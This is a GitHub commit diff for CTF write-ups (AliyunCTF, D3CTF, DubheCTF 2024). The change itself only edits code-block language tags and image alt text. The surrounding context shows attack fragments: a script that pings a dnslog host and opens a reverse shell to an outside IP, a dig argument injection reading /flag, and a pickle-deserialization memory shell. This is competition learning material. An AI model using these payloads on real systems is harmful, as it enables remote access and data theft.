Skip to content

Commit

Permalink
wip: update language tag of code block, remove alt text of image
Browse files Browse the repository at this point in the history
  • Loading branch information
Lil-Ran committed May 28, 2024
1 parent f012ecf commit 83f831c
Show file tree
Hide file tree
Showing 5 changed files with 55 additions and 67 deletions.
14 changes: 7 additions & 7 deletions source/_posts/2024-AliyunCTF.md
Original file line number Diff line number Diff line change
Expand Up @@ -294,7 +294,7 @@ string s1, string s2, string s3, string s4, string s5, string s6 -> int {

## BadApple

```Python
```javascript
let abuf = new ArrayBuffer(0x10);
let bbuf = new BigUint64Array(abuf);
let fbuf = new Float64Array(abuf);
Expand Down Expand Up @@ -735,7 +735,7 @@ if __name__ == '__main__':
main()
```

![img](../images/2024-AliyunCTF/20240325204801605.webp)
![](../images/2024-AliyunCTF/20240325204801605.webp)

## BabyDH2

Expand Down Expand Up @@ -1204,7 +1204,7 @@ if __name__ == '__main__':
g.gao()
```

![img](../images/2024-AliyunCTF/20240325204801682.webp)
![](../images/2024-AliyunCTF/20240325204801682.webp)

# Web

Expand All @@ -1218,7 +1218,7 @@ https://gtfobins.github.io/gtfobins/dig/
{"domain":"l1nyz-tel.cc","type":"-f/flag"}
```

![img](../images/2024-AliyunCTF/20240325204801511.webp)
![](../images/2024-AliyunCTF/20240325204801511.webp)

## chain17

Expand Down Expand Up @@ -1401,11 +1401,11 @@ dfs(start)

010打开发现文件中只有UTF-8字符,没有其他数据;一眼盯出,同时存在长得很像的“文”字和类似字

![img](../images/2024-AliyunCTF/20240325204801578.webp)
![](../images/2024-AliyunCTF/20240325204801578.webp)

换用兼容性不强的艺术字体(图中是字体圈欣意冠黑体)把这些字凸显出来,在Unicode表中检索,可以知道它们都是[康熙部首](https://zhuanlan.zhihu.com/p/352872903)`assert all([0x2f00 <= ord(c) <= 0x2fdf for c in '⽂⾼⾦⾄⽣⽇⽌⽤⾔⽅⾧⾯⾹⾮⾃⼈⼯⼀⼗⼥⾳⽽⽬⼤⼆⼲⼿⽃⾖⼜⾻⼐⼩⾊⽰⽕⾍⽅⿎⽴⼊⾏⽉⽇'])`

![img](../images/2024-AliyunCTF/20240325204801469.webp)
![](../images/2024-AliyunCTF/20240325204801469.webp)

原文有意义,不太可能是取这种字的字码,也不太可能是两个这种字之间的距离,因为有意义的原文不是这么好构造的。可以尝试把康熙部首和对应的正常字分别变成1和0

Expand Down Expand Up @@ -1655,7 +1655,7 @@ print(char)

得到332bits,给0和1分别上色,发现如果每14位分为一组,刚好最高位都是0,且存在相同的几行

![img](../images/2024-AliyunCTF/20240325204801445.webp)
![](../images/2024-AliyunCTF/20240325204801445.webp)

猜测14位编码一个汉字,尝试按区位码处理

Expand Down
58 changes: 23 additions & 35 deletions source/_posts/2024-D3CTF.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ mathjax: true

## 1.1 PwnShell

```C
```php
<?php
$libc = "";
$stack = "";
Expand Down Expand Up @@ -144,7 +144,7 @@ s

## 1.2 write_flag_where

```C
```python
import sys
from pwn import *

Expand Down Expand Up @@ -516,13 +516,13 @@ requests.post(url, json={ 'stdin': STDIN, 'monad': PAYLOAD1, 'elaina': PAYLOAD2

下载到别人上传的 tar 包之后发现逻辑,然后上车

![img](../images/2024-D3CTF/image1.webp)
![](../images/2024-D3CTF/image1.webp)

Exp

/.sandbox-module/bin/install-local-agent.sh 还有start-remote-agent.sh

```C++
```bash
#!/usr/bin/env bash

curl test.7b0db8c5.dnslog.store
Expand All @@ -533,7 +533,7 @@ bash -c "/bin/bash -i >& /dev/tcp/8.129.42.140/3307 0>&1"

打包,注意z参数

```C++
```bash
tar czf 1.tar sandbox .sandbox-module
```

Expand Down Expand Up @@ -791,7 +791,7 @@ Github 上给的 example 中分母就是一个 solve,猜测这里的分母和

代入两个式子后 Coppersmith 或者 gcd 两种方法都能求出 x, y

```Plain
```python
x,y=(2150041731351815713171104523921920493220624053206985451744233895108303740469684723305396314365408654901185731316940674743393624005747389336974965252847296612520628261079495101318288878763133399451251, 226424529213344999668721893182041940135510332166374912207004824461410074124256560817809951006519763202279310112144759780123971358841835703176196881303793274922977845173880043211792854018584878197697797884263497201497403074557926911586759787949296373546575946325913789515250)
from Crypto.Util.number import *

Expand Down Expand Up @@ -903,7 +903,7 @@ print(L)


```Python
```c++
#include <bits/stdc++.h>
using namespace std;

Expand Down Expand Up @@ -1026,6 +1026,9 @@ int main(int argc, char const *argv[])
}

// g++ multi.cpp -O3 -lpthread -o multi
```
```python
import random
secret_KEY = 886
from task_utils import *
Expand Down Expand Up @@ -1091,24 +1094,9 @@ class Gao:
if __name__ == '__main__':
g = Gao()
g.test_get_flag()
from PIL import Image
from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes

width, height = 72, 60
```

tap_list = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
chunk_size = 16
iv = '00000000000000000000000000000000'
iv = bytes.fromhex(iv)
enc = ImageEncryption(tap_list=tap_list, iv=iv)
img_c = Image.open('enc_from_server.png')
img_cb = image_to_bytes(img_c)
img_mb = enc.decryption(img_cb)
img_m = bytes_to_image(img_mb, width, height)
img_m.save('dec.png')
```python
from PIL import Image
from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes

Expand All @@ -1129,7 +1117,7 @@ img_m = bytes_to_image(img_mb, width, height)
img_m.save('dec.png')
```

![img](../images/2024-D3CTF/image2.webp)
![](../images/2024-D3CTF/image2.webp)

## 3.5 enctwice

Expand Down Expand Up @@ -1296,7 +1284,7 @@ if __name__ == '__main__':

用伪随机数来决定虚拟机流程的虚拟机。首先打开ida的trace function可以dump出整个大概的执行流程,提取出函数的偏移,然后用idapython脚本可以提取大概的真正有用的汇编指令

```C++
```python
from idaapi import *
from idc import *
from ida_bytes import *
Expand Down Expand Up @@ -1332,7 +1320,7 @@ open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final)

随后就是在每个xor和shl下断点

```C++
```python
def rotate_left(num, shift):
if shift >= 8:
return 0
Expand Down Expand Up @@ -1472,7 +1460,7 @@ f.write(f"{num:#x} >> {al} = {(num>>al)&0xffffffffff:#x}\n")

输入0123456789ABCDEFGHIJKLMNOPQRSTUVWXY得到trace:

```Plain
```c
0x2324252627 << 4 = 0x3242526270
0x2324252627 >> 5 = 0x119212931
0x3242526270 ^ 0x119212931 = 0x335b734b41
Expand Down Expand Up @@ -1540,15 +1528,15 @@ D3CTF(TECH-EV0LVE,EMBR@C3-PR0GR3SS)
爆破到 d3ctf{0ut??????????????} 不给爆了 乐
![img](../images/2024-D3CTF/image3.webp)
![](../images/2024-D3CTF/image3.webp)
18496 = 64 * 17 * 17, 每64byte一组,迷宫一共17*17大,win的条件是触发c000005,需要跑出去迷宫
![img](../images/2024-D3CTF/image4.webp)
![](../images/2024-D3CTF/image4.webp)
SEH里边根据当前位置的两个常量计算返回地址,num 1,2就是下图data里的两个常量,所以走迷宫,从MSB开始根据每一位是0还是1决定用上边两个还是下边两个计算下一次跳转的位置
![img](../images/2024-D3CTF/image5.webp)
![](../images/2024-D3CTF/image5.webp)
想走出去最后一次应该计算出一个比较大的值,那从0x406030+18496每64byte切片,然后从FF开始反向搜索,上图每两个cli对应一个flag bit上边是0下边是1,每两个cli里常量上边是*1的下边是*17的
Expand Down Expand Up @@ -1605,7 +1593,7 @@ for a in range(33, 127):
f.close()
```

![img](../images/2024-D3CTF/image6.webp)
![](../images/2024-D3CTF/image6.webp)

## 4.4 ezjunk

Expand All @@ -1621,7 +1609,7 @@ fakeflag和flag在tea上无区别

**crc校验:**

![img](../images/2024-D3CTF/image7.webp)
![](../images/2024-D3CTF/image7.webp)

exp:

Expand Down Expand Up @@ -1735,7 +1723,7 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=

附件里有一个 OpenVPN 配置,但是缺少了 TLS key 部份。然后题目说缺失的部份在前往 `2a13:b487:11aa::d3:c7f:2f` 的路径上。所以就 mtr 一下,得到:

![img](../images/2024-D3CTF/image8.webp)
![](../images/2024-D3CTF/image8.webp)

按顺序拼起来就是 TLS key,而且长度刚好是整数。有了完整配置之后,就能通过 OpenVPN 连上实例。

Expand All @@ -1751,4 +1739,4 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=

在activity里有flag

![img](../images/2024-D3CTF/image9.webp)
![](../images/2024-D3CTF/image9.webp)
22 changes: 11 additions & 11 deletions source/_posts/2024-DubheCTF.md
Original file line number Diff line number Diff line change
Expand Up @@ -18,9 +18,9 @@ toc: true
根据提示开始脑洞,githack dump 源码

![img](../images/2024-DubheCTF/20240319010444813.webp)
![](../images/2024-DubheCTF/20240319010444813.webp)

![img](../images/2024-DubheCTF/20240319010444894.webp)
![](../images/2024-DubheCTF/20240319010444894.webp)

通过 `range: bytes={start}-{end}` 来读取 mem 中的密钥,伪造成 admin 上传 pt 文件,之后 torch load 的时候触发 pickle 反序列化。

Expand Down Expand Up @@ -156,7 +156,7 @@ if __name__ == '__main__':

Pickle 反序列化的时候,exec 执行一段 python 代码,新建一个 `@app.post("/")` 路由(相当于内存马?

![img](../images/2024-DubheCTF/20240319010444749.webp)
![](../images/2024-DubheCTF/20240319010444749.webp)

将 bot 发送的东西都写到一个文件里,弹 shell 进去 cat 看看即可

Expand Down Expand Up @@ -297,7 +297,7 @@ http://1.95.13.243:49319/getlocal?path=/app/pref.yml

同时看到没有打开 cache 功能

![img](../images/2024-DubheCTF/20240319010444775.webp)
![](../images/2024-DubheCTF/20240319010444775.webp)

需要找另一个文件写入点

Expand All @@ -322,15 +322,15 @@ function parse(x) {

http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103782304169366230

![img](../images/2024-DubheCTF/20240319010444751.webp)
![](../images/2024-DubheCTF/20240319010444751.webp)

## Javolution

游戏逻辑有一个负数溢出?反正打败恶龙了.jpg

http://1.95.54.152:34473/pal/cheat?hp=-1000000000&attack=-1000000000&defense=-1000000000

![img](../images/2024-DubheCTF/20240319010444758.webp)
![](../images/2024-DubheCTF/20240319010444758.webp)

然后 level 变 50

Expand All @@ -350,7 +350,7 @@ Jdk 17 反序列化
--add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED
```

![img](../images/2024-DubheCTF/20240319010444936.webp)
![](../images/2024-DubheCTF/20240319010444936.webp)

```Java
import com.fasterxml.jackson.databind.node.POJONode;
Expand Down Expand Up @@ -720,7 +720,7 @@ for t in range(0, 257):
pass
```

![img](../images/2024-DubheCTF/20240319010444891.webp)
![](../images/2024-DubheCTF/20240319010444891.webp)

你永远可以相信可靠的J神逆出来的代码不会有任何问题

Expand Down Expand Up @@ -921,7 +921,7 @@ sh.interactive()
print(open('/flag').read())
```

![img](../images/2024-DubheCTF/20240319010444993.webp)
![](../images/2024-DubheCTF/20240319010444993.webp)

```
DubheCTF{l3HC7F_h45_4_8e77ER_Ch4lLEngE!}
Expand Down Expand Up @@ -999,7 +999,7 @@ alt-svc: h3=":443"; ma=86400

搭好这个隧道之后,就可以用 https://devtools.devprod.cloudflare.dev 连接这个 inspect 端口对 wrangler 项目进行调试。不过断点貌似不是很好下,不过可以在 Memory 里直接把整个 heap snapshot 导出,导出之后搜索一下 flag 就可以了。

![img](../images/2024-DubheCTF/20240319010444931.webp)
![](../images/2024-DubheCTF/20240319010444931.webp)

## no more taowa

Expand Down Expand Up @@ -1504,7 +1504,7 @@ if __name__ == '__main__':
# print(png_judge_type('./lsb_msb_test/' + f))
```

![img](../images/2024-DubheCTF/20240319010445007.webp)
![](../images/2024-DubheCTF/20240319010445007.webp)

```
DubheCTF{j00_H4V3_m4573r3d_m47Ry05HK4_d0Ll2!}
Expand Down
Loading

0 comments on commit 83f831c

Please sign in to comment.